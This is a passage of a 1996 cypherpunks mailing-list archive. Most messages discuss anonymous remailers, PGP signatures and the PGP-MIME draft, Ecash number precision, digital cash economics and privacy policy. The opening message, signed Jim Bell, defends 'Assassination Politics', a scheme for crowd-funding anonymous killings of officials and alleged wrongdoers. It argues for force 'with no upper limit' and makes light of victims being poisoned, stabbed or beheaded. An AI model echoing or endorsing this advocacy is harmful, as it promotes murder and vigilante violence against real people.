>> you solve all problems automatically"
>	
>	It is more the MAD theory brought down to the personal level.

With all due respect, I think that comparison is a bit flawed.  MAD (mutual 
assured destruction) is based on a model where you know the enemy (country) 
attacking you, in the national model by sophisticated radar systems.  It is 
also based on the (reasonable) assumption that there is no way to 
pre-emptively attack in such a way as to defeat the ability of the enemy to 
counter-attack.

With AP, and a world populated by 5 billion people, there is no way to know, 
for sure, who is targeting you.  You may _guess_, and you may be right, but 
such a guess must be based on external information that you've received 
elsewhere.  With AP, you CAN attack and destroy an individual in such a way 
he doesn't know who hit him.  A crook who has victimized many people would 
be an excellent example of a target who can't know, because he has many 
enemies.  A person who has just jilted a rich lover and has no other enemies 
would be the opposite.  
I contend that the kind of targets which are the most "deserving" will tend 
to be those who don't know who's targeting them.  Those that are least 
deserving will have a good clue about who's giving them the finger.  Since 
such prices are publicly known, a donor would have to be particularly 
careful about targeting a generally  good, well-liked person, if that person 
could reasonably guess who's naming him.  This is one of the many reasons I 
have a fair degree of confidence that AP will do a lot of good, and very 
little bad.

> The
>government has the power and authority to kill anyone of us, AP brings out
>into the open the fact that WE ALL HAVE THAT POWER. KIlling people is
>(physically) very easy, AP turns the THREAT back on those who hold the
>power.

This I agree with.  But remember that the ability to combine the desires of 
thousands of people counts for something as well.  If the only time you had 
to worry is if one individual was mad enough to see you dead, and would 
either do it himself or pay the whole bill himself, you'd feel relatively 
safe.  If, on the other hand, the cost could be split up 10,000 ways or 
more,  you'd better not be a crook!


>Note: I don't necessarily think that AP is a good idea. I think
>that people should do their own dirty work.

In practice, I think this would be comparatively common as well.  What 
currently deters such "take the law into your own hands" is the fact that 
police (being, essentially, in the business of protection) don't want you to 
provide for yourself by protecting yourself.  They make it hard on people, 
in the same way they did with Bernard Goetz, the guy who shot four muggers 
on the New York city subway system.  Once AP gets rid of the police, it will 
be much easier to protect yourself and not risk jail time, etc.

Superficially, a person might argue that the lack of police would also make 
it easier for the muggers.  However, a "professional mugger" would make a 
LOT of enemies, and it wouldn't take long before he's dead.  He'd only have 
to be caught once.  Any victim of any mugger would be happy to donate to see 
him gone.

>> such is the total moral perversion of the thinking behind 
>> "assassination politics". most of the adherents work from the 
>> following argument, nicely summarized by JFA above:
>> 1. the government is corrupt
>> 2. therefore, it is okay to kill people who further that corruption.
>> wow, what brilliant logic. 
>
>	How about this:
>	Goverments, and the people in them are corrupt. This corruption,
>caused by acts of these people, lead to oppression and death. By THEIR
>MORALITY oppression and killing are ok, so it is ok to use their tools
>agaisnt them.

In part 7 I use somewhat different justification.  I believe that a person 
should be able to use whatever level is force is necessry to get rid of the 
transgression, with no upper limit.  In any case, I think that government 
corruption is way more than enough to justify whatever level of 
counter-attack is needed.

>> there is a trite saying, "two wrongs do not make a right" (trite
>> because most have mastered the simple truth of it in their pre-teen
>> years). a concept not grasped by some second-graders. some 
>> require a lifetime of lessons to comprehend it in the end..
>
>	Putting people in cages is wrong.
>	Stealing is wrong.
>	Is putting people in cages for stealing wrong?

Yes; I've noticed that people who oppose AP generally don't want to address 
the question of self-defense issues.

>> carefully the errors of those who have come before you. write
>> a long treatise with lots of footnotes to past assassination
>> difficulties and how you would advance past them. I tell
>> you flat out that any respectable assassin would be quite embarrassed
>> to be associated with you at the moment because of your arrogance
>> and ignorance.
>
>	I might be wrong here, but I don't think that Mr. Bell actually
>wants anyone actually shot,

Shot?  Not necessarily.  Let's not forget about blown up, poisoned, stabbed, 
beheaded, etc.  B^)


> well, maybe he does, but what he wants is to
>have the same power over members of governments than they have over him.

Right.  Moreover,  I believe that governments simply cannot exist as we know 
them under these circumstances.  Besides, they won't be necessary.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hendersn@zeta.org.au (Zed)
Date: Wed, 22 May 1996 06:35:19 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <199605211643.CAA17096@godzilla.zeta.org.au>
MIME-Version: 1.0
Content-Type: text/plain


>At 02:08 AM 5/20/96 EDT, you wrote:
>>	What countries are noticeable for being anti-Scientology? 
>>       They would appear to be good locations for special-purpose 
>>       remailer ultimate-output ends.
>
>Scientology was illegal in Australia last time I heard.

Not at the moment. It was only banned in one state(can't remember which one)
and that ban was lifted some time ago.

>  They declared
>that you could not be a religion and charge a fee for religious service
>the way that Scientology charges.

It was tried, but didn't work. The final court ruling was that Australian
Government wasn't allowed to decide what did or didn't constitute a genuine
religious practice. $cientology can charge what it likes.

>  They then defined them as practicing
>medicine, and hit them with snake oil laws.

And the religion cover let them skip away unharmed. The Church's "benefits"
are spiritual in nature(allegedly) and therefore not subject to medical
regulations.

Now to try to get this back on-topic, there was one NOTS document which was
posted anonymously before the whole pack made it to
alt.religion.scientology. It described a process(or "ritual" if you prefer)
designed to help _physical_ affliction. It _may_ violate an FDA ruling
prohibiting the Church from practising medicine. It is _definitely_ a
violation of copyright to post it and one person, Keith Henson, is getting
sued for quoting it. Now, was sending this NOTS document through an
anonymous remailer a good or a bad thing to do?  
  Zed(hendersn@zeta.org.au)
"Don't hate the media, become the media" - Jello Biafra
  PGP key on request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 20:00:40 +0800
To: dsmith@prairienet.org
Subject: Re: Long-Lived Remailers
Message-ID: <01I4ZO8U2J4O8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"dsmith@prairienet.org" 22-MAY-1996 01:33:37.30

>Actually, there's an Idea.  Set up a single address; use added
>headers in the style of:

>::
>Remailers-To-Chain: 7
>Remailers-To-Avoid: remailer@nsa.gov
>Final-Destination: tcmay@got.net

>Each remailer could construct a message that decrements the
>remailers counter, preserving the other headers.  The
>usual caveat on encrypting at each step would apply; but since
>remailers' pubkeys are available, that's a trivial concern.

	Well, if you use this for the entirety of the chain, you'll be giving
away the cleartext at each step. Not too good of an idea. You won't want
the mails to an output location to themselves go through remailers; you'd want
multiple remailers going to the same output location (or group of output
locations, which is probably preferable) via a more direct means such as POP.
Otherwise, you've simply got the same old - but good nonetheless - of adding
on new full remailers to the end of a chain, which doesn't avoid problems for
the full remailer at the end. (Re: TCMay's post in response to yours.)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 18:47:22 +0800
To: frantz@netcom.com
Subject: Re: Senator, your public key please?
Message-ID: <01I4ZOC70QOE8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 22-MAY-1996 01:45:15.84

>Perhaps what is needed is anti-gravity for those signitures that are not
>desired by the key owner.  The resulting map should show the closeness of
>the relationship.

	I could see two different maps, one with such a feature (eliminating
relationships, or causing to repulse those which weren't with permissions -
via signing the signatures, or via mutual signing, as mentioned before by you
and me), and the other with all links. Both would give some interesting
interpretations.
	One other way to use this would be to try out different transitivity
of trust measurements and see what produced the most logical result while
still (via other analysis) avoiding spoofing/MITM problems.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 18:59:16 +0800
To: cypherpunks@toad.com
Subject: Advanced Surveillance Technologies Conference II
Message-ID: <01I4ZP1Q5GPS8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu" 22-MAY-1996 03:08:05.95
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: 15 May 1996 13:06:53 -0500
From: "Dave Banisar" <banisar@epic.org>
To: "Privacy International" <pi@privacy.org>
Subject: AST II Conference

                     Preliminary Conference Announcement

    
                   ADVANCED SURVEILLANCE TECHNOLOGIES II
 
                                Sponsored by

                            Privacy International
                   Electronic Privacy Information Center

                             September 16, 1996
                                    
                  Citadel Ottawa Hotel and Convention Centre
                                Ottawa, Canada

----------------------------------------------------------------------------

The rapid evolution of technology is leading to the creation of a seamless
web of surveillance across much of the world. Powerful technologies
originally developed for the military are being adopted by law enforcement
and civilian agencies, and private companies to monitor entire populations.
This has been further fueled by the end of the Cold War and increasing
demands for greater bureaucratic efficiency. Existing laws and regulations
have failed to keep up with these developments.

This one day conference will examine a range of advanced surveillance
technologies and their impact on privacy and other civil liberties. It will
explore the process of planning and implementation of the technologies,
their operating conditions, and the people and organizations responsible for
them. The conference will also examine possible technical, regulatory and
legal responses.

The conference will also address in detail the findings of Privacy
International's "Big Brother Incorporated" report which examined the
international trade in surveillance technology and the involvement of the
arms industry.

----------------------------------------------------------------------------


PARTIAL LIST OF SPEAKERS

Phil Agre, University of California, San Diego
Dave Banisar, Electronic Privacy Information Center
Colin Bennett, University of Victoria
Simon Davies, London School of Economics & Director, Privacy International
Wayne Madsen, Author, Handbook of Personal Data Protection
Bruce Schneier, Counterpane Systems & Author, Applied Cryptography


CONFERENCE SUBJECTS

   * Artificial Intelligence Systems
   * Biometric Identification
   * Digital Cash
   * Information Superhighways
   * Information Warfare
   * Infrared and Passive Millimeter Wave Detectors
   * Intelligent Transportation Systems
   * Other New Technologies

----------------------------------------------------------------------------

MORE INFORMATION

More information on the conference will be available at the Privacy 
International mailing list at pi-news@privacy.org (subject: subscribe) or 
at the PI Home Page at http://www.privacy.org/pi/conference/ottawa/

----------------------------------------------------------------------------

HOTEL

The Conference will take place at Ottawa Citadel Hotel in Ottawa, Canada. A
block of rooms has been reserved at the hotel at a discounted rate of CAN
$81.00/night for a single $91/night for a double. The hotel should be
contacted directly for reservations, mentioning the AST II Conference to get
the special rates and early reservation is recommended. The address is
Ottawa Citadel Hotel, 101 Lyon St., Ottawa, Canada K1R 5T9, attention
reservations, fax 613-237-2351, phone 613-237-3600. In North America you can
call toll free at 1-800-567-3600.

----------------------------------------------------------------------------

OTHER EVENTS THAT WEEK

There are several other conferences in Ottawa that week. On Tuesday, 
September 17, Industry Canada will be sponsoring a one day Symposium and 
Demonstration of privacy enhancing technologies. On September 18 - 20, 
the Privacy Commissioner of Canada will be hosting the 18th International 
Privacy and Data Protection Conference. Contact: 613-995-2410 or email 
jroy@nstn.ca.

----------------------------------------------------------------------------

REGISTRATION

Registration Fees

[] Standard - $250 CAN ($175 US)
[] Non-profit organizations/Educational - $125 CAN ($75 US)

Information

Name:     ___________________________________________________________

Organization:  ______________________________________________________

Address:    _________________________________________________________
 
   __________________________________________________________________

Phone/Fax:  _________________________________________________________

Electronic Mail:_____________________________________________________

Credit card Number/Expiration Date: _________________________________
 (Do Not Email!)


Fax Registration form and credit card number to +1 202.547.5482

Send Check or Money Order in $US made out to Privacy International to:

        Privacy International Washington Office
        666 Pennsylvania Ave, SE, Suite 301
        Washington, DC 20003 USA
        1-202-544-9240 (phone)
        1-202-547-5482 (fax)
        pi@privacy.org(email)

----------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: middle-man-admin@alpha.c2.org
Date: Wed, 22 May 1996 23:55:01 +0800
To: cypherpunks@toad.com
Subject: Re: The Twilight of the Remailers?
Message-ID: <199605221131.EAA06184@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Timothy C. May wrote:

> At 7:59 PM 5/21/96, Alex Strasheim wrote:
> >I'm closing my mixmaster, nsa@omaha.com, on the 4th of June.

> Between Hacktic going down, Hal's comments that he may shut down his two
> sites, and this, plus others who are more quietly making plans to shut
> down, I think the thread title "The Remailer Crisis" is more apt than ever.

	I tend to agree. I realize that the middle-man remailer requires
that there be bastion remailers on the end of the chain. Without them, the
"middle-man" concept won't work. I thank the remailer sites the allow the
middle-man to work.

	Anyway, with all the remailers that have either vocalized their
retirement and those that are silently considering retirement, I would
like to announce that the middle-man remailer should be available for
download as early as this weekend. Utopia.hacktic.nl (basement) and c2.org
have agreed to carry the middle-man remailer on their FTP sites. As soon
as I can get the documentation finished, I'll post it.

				middle-man-admin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pat Farrell <pfarrell@netcom.com>
Date: Wed, 22 May 1996 23:26:19 +0800
To: cypherpunks@toad.com
Subject: DC area physical meeting, this saturday
Message-ID: <199605221125.EAA11190@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Appologies to the 1000+ folks who are too far away to care about this...

The next Washington DC area cypherpunks physical meeting will be this saturday,
May 25 at 3:00 PM, at Digex.net. Details, directions, etc. at
http://www.isse.gmu.edu/~pfarrell/dccp

Pat
Pat Farrell        Grad Student         http://www.isse.gmu.edu/~pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 22 May 1996 22:51:46 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: The Crisis with Remailers
In-Reply-To: <2.2.32.19960521175237.0036cc44@mail.pi.se>
Message-ID: <199605220958.LAA16017@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Matts Kallionieme <matts@pi.se> wrote:

> At 17:44 1996-05-21 +0200, bryce@digicash.com wrote:
> >Matts, you don't want to do floating point for money, because
> >floating point doesn't give you good control of precision.
> 
> Yes I do. Several major currency traders in Sweden keep all
> their money in 64 bit floating point storage. I think that DigiCash
> will go floating point (get real?) when you start doing currency.
> If you sell 1 DEM, you don't want to get paid in cents, you want
> to get paid in 10-15 decimal places. That's where the currency
> action is right now, and before Ecash(tm) is fully deployed we'll
> probably see traders going for 15-20 decimal places. Floating
> point is the way to do it, but are your accountants ready for it?


Matts, _floating_ point numbers are numbers in which the decimal
place moves ("floats") around depending on the value of the 
number.  Floating point numbers are convenient if you want to 
handle a number that isn't going to be too large, and that isn't
going to need a great deal of precision.  They are _not_ useful 
if you want to handle a number with a lot of precision, nor
indeed, if you want to be able to _know_ the precision!  If you
have a number that represents money, you want to know the 
precision!


As an aside, there are rare cases when you will use a floating point
number to _represent_ a fixed-point number just because the
floating point math is faster on your hardware.  As far as 
I know, this only happens on certain supercomputers.


I shall try to refrain from taking umbrage at your comment that
DigiCash is "not real".  Also that DigiCash doesn't "do"
currency.  What could you possibly mean by that?


> >Keep in mind that only Ecash(tm) Mints can create Ecash(tm) 
> >coins and choose what values the coins have.
> 
> Sorry, I thought that the client created the coins and the mint
> just signed them. I guess I should go back to RTFAPI.


I'm sorry-- I didn't speak clearly.  _Kinds_ of coins, including
such things as the currency and base value (i.e. smallest 
possible coin) are created by Mints.  We call these "coinages".
They are analogous to new kinds of coin or paper notes in 
traditional currency.  The individual coins are generated by the
Ecash(tm) client, but those coins are worthless until they are
stamped by the Mint, giving them a currency and denomination 
(i.e., is this a 5-dollar-cent coin, a 10-dollar-cent coin, a 
100-Finnish-Mark coin, etc.).


For further reading material as well as <a
href="http://www.digicash.com/api"> the API </a>, I can
recommend <a href="http://www.digicash.com/ecash/faq.html"> the
Ecash(tm) FAQ </a>, <a
href="http://www-ugrad.cs.colorado.edu/~wilcoxb/faq"> the Bryce 
(not speaking for DigiCash on these pages) FAQ </a>, the
somewhat out-dated <a
href="http://www.digicash.com/ecash/protocol.html"> Ecash(tm)
protocol description </a>, and Ian Goldberg's <a
href="http://www.cs.berkeley.edu/~iang/ecash/"> Ecash(tm) pages
</a>.


For further reading on floating point and other representations
of numbers in computing, I recommend any good introductory
university text on mathematical computing.  Sorry I don't have
mine handy or I'd give you a specific reference.


Regards,

Bryce

- -----BEGIN GOODTIMES VIRUS INNOCULATION-----
Copy me into your .sig for added protection!
- ----- END  GOODTIMES VIRUS INNOCULATION-----



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMaLlGkjbHy8sKZitAQFNmwMAzoYmjg8XQ5lG+Uq8vEzpwTe8TWWcGx6Z
zsc02WNMRAzT9iu/upK14bW8kdtAr5f50z3FSpUdbtOr9YbNi8akdZaWYH2w03Xg
VivCG3FzfyT03vZtyMEPN1+eEcWSrCt7
=aa73
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul.elliott@hrnowl.lonestar.org (Paul Elliott)
Date: Tue, 28 May 1996 17:34:32 +0800
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: PGP MIME INTERNET DRAFT considered harmful.
Message-ID: <199605280509.WAA04350@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Summary: The PGP MIME INTERNET DRAFT, draft-elkins-pem-pgp-03.txt,
contains a design error with respect to signatures on binary data.


This error results from the failure to recognize the distinction between
those features of MIME which are necessary to represent complex data and
those features of MIME that are used to transport the data.

The design error will result in the following negative results if
PGP-MIME is widely used with binary data.

(1) Huge unnecessary inefficiency whenever binary data is sent signed
and encrypted.

(2) The signatures on PGP MIMEd objects can not be extracted from a MIME
context and used where MIME programs are not available.

(3) Many users will rightly refuse to sign the entities the PGP-MIME
draft envisions. This reduces the utility of PGP-MIME.

(4) If users do sign these files, they will be signing data for which
there are no commonly available inspection tools. This will eventually
result in a security breach.

- ----------------------------------------------------------------------


The problem is that when binary data is to be signed the data is to be
PGPed _after_ base64 has been applied and the MIME headers added.

This is required by the draft:
>
>3.  Content-Transfer-Encoding restrictions
>
>     Multipart/signed and multipart/encrypted are to be treated by agents
>     as opaque, meaning that the data is not to be altered in any way
>     [1].  However, many existing mail gateways will detect if the next
>     hop does not support MIME or 8-bit data and perform conversion to
>     either Quoted-Printable or Base64.  This presents serious problems
>     for multipart/signed, in particular, where the signature is
>     invalidated when such an operation occurs.  For this reason it is
>     necessary to REQUIRE that ALL data signed according to this protocol
>     be constrained to 7 bits (8-bit data should be encoded using either
>     Quoted-Printable or Base64).  Note that this also includes the case
>     where a signed object is also encrypted (see section 6).  This
>     restriction will increase the likelihood that the signature will be
>     valid upon receipt.
>
>     Data that is only to be encrypted is allowed to contain 8-bit
>     characters and therefore need not be converted to a 7-bit format.
>
>
In this the draft follows RFC1847.

[Encrypted & Signed binary data.] 
Now when there is a data path for PGP's cyphertext, PGP provides a
binary data path for its plain text. Thus, the inner base64 that PGP
MIME internet draft requires is totally unnecessary. It will cause a 30%
increase in the size of those messages that are encrypted and signed and
large amounts of CPU time will be used applying & removing the base64.

It is worth noting that huge amounts of binary data will be transferred
by MIME, so the above represents a significant problem.

[Signed binary data.]
Now let us consider the question of what PGP-MIME draft requires users
to sign. Suppose we want to send a signed .gif file to a sysop. The
sysop wants to store the .gif in his download section. Suppose the sysop
wants to store the signature as a detached signature so that people who
download it can check the authorship. But the signature proposed by the
PGP-MIME draft is useless for this purpose. It has MIME headers attached
and it has been base64'ed. People who download such a file from a BBS
have no use for it, unless they have MIME.

Or suppose we send as signed .gif file to the maintainer of a WEB page.
He stores the .gif on an insecure UNIX system connected to the internet.
Suppose, a year later the maintainer wants to check if the .gif has been
tampered with. Can the maintainer store the signature on a floppy and
use the signature for later checking? No, the only way the signatures
specified by the draft can be used, would be to add MIME headers and
apply base64. The maintainer will have to store the entire MIME message,
.gif and all if he wants to check the signature later.

Or let us consider an .gif artist. The artist has a policy of only
signing works that he can be proud of. He does not sign his sketches,
because he does not want sketches to tarnish his reputation. Before
signing and releasing a work, he examines it with several different gif
viewers and paint programs. But what does the draft PGP-MIME want the
artist to sign? It wants him to sign a file that has been base64'ed and
with mime headers added. The artist can not examine the file to be
signed with any of his gif viewers or paint programs. Everyone's mother
has told them to "Never sign anything unless you have read the fine
print first." But here we have a file that has been scrambled so that it
can not be inspected with the commonly available tools. The artist
refuses to sign. Not only does he not know what he is signing, but the
base64 offends his artistic standards. Who can be proud of base64?
Necessary perhaps, but lets face it, base64 is an horrible kludge built
to meet the deficiencies of a network.

If users get in the habit of signing binary files which represent
multimedia data, and which can not be examined with commonly available
inspection tools, it is inevitable and predictable that sooner or later
this will cause some kind of negative security event.

Now there is some justification for the way the draft handles text.
Different operating systems and machine architectures represent text in
different ways, so that it is necessary that digital signatures be taken
over some "canonical" format so that signatures will check on different
operating systems. Even after text has been mangled by Quoted-Printable 
it can still be read after a fashion by the person asked to sign it.

Operating systems and machine architectures also differ in the way they
represent binary data. The differences in the ways integers, floating
point numbers and other such thingies are represented are  well known.
However, such differences must be handled at the application level. The
location within a file of integers, floating points, etc must be set by
the application programmer/designer. PGP, MIME, and base64 can not deal
with these differences, because the location of integers and floats can
not be specified in advance for an arbitrary data file. Thus, from the
point of view of PGP and base64, these differences do not exist and
binary data may as well be a stream of bytes. Thus, in the case of
binary data, base64 is not more "canonical" than the original data.
There is no good reason to sign the base64 rather than the original
data. Once a file has been base64ed, the file can not be examined
with the usual inspection tools.

The draft has chosen to treat text and binary data similarly. This
results in negative results mentioned above, but the developer and draft
author do not have to deal with any logic to handle text and binary data
separately. User utility and security have been sacrificed for the
convenience of simplicity for the draft author and the PGP-MIME
developer.


The typical user of MIME software is not necessarily technically
sophisticated. When the deficiencies and disasters associated with
software patterned on this draft become apparent, not everyone will know
exactly which software component is at fault. The problems associated
with the draft (or its successors) may adversely affect the reputation
of PGP.

Now some descendant of the draft could become a standard or the draft
could become a de-facto standard through wide-spread  use. Such a
standard could become a barrier to the acceptance of other software
without the draft's deficiencies. Thus, the draft could permanently
inflict poor software on the world. (Look at the memory architecture of
the IBMPC for one example. Or look at the MSDOS operating system for
another example.)

The draft should be withdrawn. People should rethink and create a better
plan to combine the benefits of PGP and MIME.

It should accommodate the user who wishes to mail a generally usable PGP
signature (that is, one that can be used outside the context of MIME)
along with multimedia binary data.

It should not ask a user to apply a signature to any data that cannot be
examined with commonly available tools.

It should not require anyone to sign an artifact of a data transfer
system such as base64.

It should not require any additional space overhead  (more than that
which may be necessary for transport) when signing and encrypting.

- --
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: cp850

iQCVAgUBMaBPRPBUQYbUhJh5AQH2hwP+J1ADSzD3Yx4gvUIvAwN+EDikIN2IaHhM
j+znIlt9QPzl5SSp44H+JnhoivhKR3562ACI1nexNMZ9E2MrPNioiGmrmz0uGwM6
Px/k2HbioQrgqmmP0IO/98cTZGA71pK7iNk7AZbWpEW4XfWkyRDW9hQzrCEZXXw8
jQwM/VHUPl8=
=BvoZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@2005.bart.nl (Senator Exon)
Date: Sat, 25 May 1996 14:09:59 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605220300.FAA15035@spoof.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


Enough already?  Please!
----------------------------------------------------------------------
 *WARNING* *WARNING* *WARNING* *WARNING* *WARNING* *WARNING* *WARNING*
This message has been forwarded using your anon id on the anon.penet.fi
anonymous server, but any direct reply will show your real name/address.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 23 May 1996 02:11:28 +0800
To: cypherpunks@toad.com
Subject: Reply to e$: The Wealth of Nation-States
Message-ID: <v03006615adc8b36ab188@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Tue, 21 May 1996 23:35:22 +0900
To: rah@shipwright.com
From: tatsuo@glocom.ac.jp (Tatsuo Tanaka)
X-Sender: tatsuo@izanagi.glocom.ac.jp
Subject: Reply to e$: The Wealth of Nation-States
Cc: tatsuo@glocom.ac.jp (Tatsuo Tanaka)
MIME-Version: 1.0

Dear Mr. Robert Hettinga,

Please allow me to write you. I am a visiting research fellow of Columbia
University, and study digital cash from the economics point fo view.  I
read your article on "e$:The Wealth of Nation-States." ineterestingly.  I
also think that digital cash will cause a conflict with the Nation-States,
though my major concern is financial economics view point, not taxation
problem. I wrote a paper on this issue,"Possible Economic Consequences of
Digital Cash " which is supposed to be presented at the coming INET96.
This paper's URL is

http://tenjin.glocom.ac.jp/tanaka/inet/DigitalCash_v1e.html

I hope this paper might be of interest to you.

Following is an abstract of this paper.

Author discusses possible consequences of digital cash from the view of
economics and forcasts a possible scenario for the future. Digital cash
will bring us benefits as well as problems. One major benefit of digital
cash is its increased efficiency which will open new business
opportunities, especially for small businesses. On the other hand, it will
bring us four problems: taxation and money laundering, instability of the
foreign exchange rate, disturbance of money supply, and the possibility of
financial crisis. There is one important attribute of digital cash,
however, that overshadows these benefit and problems. It is the
transnationality of digital cash, that is, the ability of digital
cash to flow freely accross national borders. Every bank can issue it and
everybody all over the world can use it. This transnationality is a cause
for both benefits and problems, and could have significant repurcussions
internationally. From the economic stand point, the most important
characteristic of digital cash is its transnationality. If digital cash
circulated only within a traditional national border and was controlled
under a central monetary authority, there would be no economic implications
that would be worth analyzing. In this case, digital cash would be nothing
more than a convenient transaction method such as a credit card. However,
digital cash is more than that. Its transnationality  has the potential to
cause conflict between cyberspace and nation states. If digital cash
spreads successfully in the 21st century, its history may be written as a
record of its battle with nation states.


Thank you for your time.


Sincerely yours,


Tatsuo TANAKA

Tatsuo Tanaka   Email:tatsuo@glocom.ac.jp
 -Current Address-                      -Contact in Japan-
Center on Japanese Economy & Businness   Center for Global Communications
521 Uris Hall                            International Univ. of Japan
Columbia University                      6-15-21, Roppongi,Minato-ku
New York, NY, 10027, USA                 Tokyo 106,Japan
Fax:+1-212-678-6958 Tel:665-5028         Fax:+81-3-5412-7111 Tel:5411-6677

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Thu, 23 May 1996 02:24:43 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Bit tax proposal?
In-Reply-To: <01I4ZMQQODUA8Y5IL9@mbcl.rutgers.edu>
Message-ID: <31A313CA.405D@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


E. ALLEN SMITH forwarded:
>
> ... And what about the tax rate itself? Is it too high or not high enough? 
> If the tax of .000001 cents per bit yields too much revenue, then it can
> always be adjusted.

ROTFL.



______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 23 May 1996 01:02:11 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: FTC online workshop on privacy
In-Reply-To: <01I4ZKWPMI7K8Y5IL9@mbcl.rutgers.edu>
Message-ID: <glckRlq00YUzM2Wv4o@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 22-May-96 FTC online workshop on
privacy by "E. ALLEN SMITH"@ocelot. 
> Date: Wed, 22 May 1996 01:08 EDT
> From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
> Subject: FTC online workshop on privacy
> To: cypherpunks@toad.com
>  
>         Pointing out encryption, anonymnity, etcetera as means couldn't
> hurt...

Speaking of privacy and cypherpunkly interests, one bill that seems to
have grown out of the FTC's recent interest in the area will be
introduced in two hours.

The legislation being introduced at 10:30 am will restrict selling
mailing lists with childrens' names and other identifying info on them,
including email lists. Another attempt to regulate the net, or a good
thing?

Supporting is Christian Coalition, Family Research Council, Enough is
Enough!, Bruce "I wrote the CDA" Taylor's group, and EPIC.

I'm not sure what I think of it, since I just got the text of the
legislation yesterday.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 23 May 1996 02:23:08 +0800
To: cypherpunks@toad.com
Subject: Re: Rumor: DSS Broken?
In-Reply-To: <Pine.LNX.3.93.960521194417.954C-100000@smoke.suba.com>
Message-ID: <doug-9604221337.AA00152816@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Snow wrote:
>
>> 
>> Yes, it is.  But I'd like to think that the NSA isn't acting as if WE are 
>> the "enemy."
>
>	I'd like to beleive that Santa will bring me Sparc20. 
>
>

20! you set your sites too low. Ask Santa for an Ultra! :)
Not much more expensive, a whole lot more powerful.
Just think of the numbers you can crunch.. Wonderful machine.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
